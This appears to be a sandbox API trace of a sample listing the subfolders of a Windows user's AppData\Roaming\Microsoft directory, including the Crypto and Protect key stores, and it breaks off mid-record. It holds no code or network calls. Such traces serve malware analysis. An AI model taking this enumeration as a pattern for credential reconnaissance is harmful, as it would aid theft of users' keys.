[0207.447] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", lpFilePart=0x0) returned 0x33 [0207.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.447] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", lpFilePart=0x0) returned 0x33 [0207.448] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.449] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.449] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0207.449] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0207.449] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.449] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpFilePart=0x0) returned 0x45 [0207.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.449] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpFilePart=0x0) returned 0x45 [0207.449] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.486] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.486] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0207.486] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0207.486] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.486] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", lpFilePart=0x0) returned 0x32 [0207.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.487] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", lpFilePart=0x0) returned 0x32 [0207.487] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.488] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.488] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0207.488] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0207.488] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.488] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3e [0207.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.489] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3e [0207.489] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.489] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.489] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0207.489] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0207.489] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.490] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x34 [0207.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.490] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x34 [0207.490] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.491] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.491] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0207.492] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0207.492] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.492] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", lpFilePart=0x0) returned 0x33 [0207.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.492] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", lpFilePart=0x0) returned 0x33 [0207.492] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.539] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.539] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2868d050, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2868d050, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2868d050, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0207.540] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0207.540] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 0 [0207.540] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.541] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x34 [0207.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.541] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x34 [0207.541] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.542] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.542] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53aa4cd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x53aa4cd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a502870, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0207.542] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b267fb0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a907d30, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x93e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0207.542] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0207.542] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.542] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", lpFilePart=0x0) returned 0x32 [0207.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.542] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", lpFilePart=0x0) returned 0x32 [0207.543] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.603] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.604] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.604] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.604] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", lpFilePart=0x0) returned 0x34 [0207.604] SetThreadErrorMode (dwNewMode=0x1, 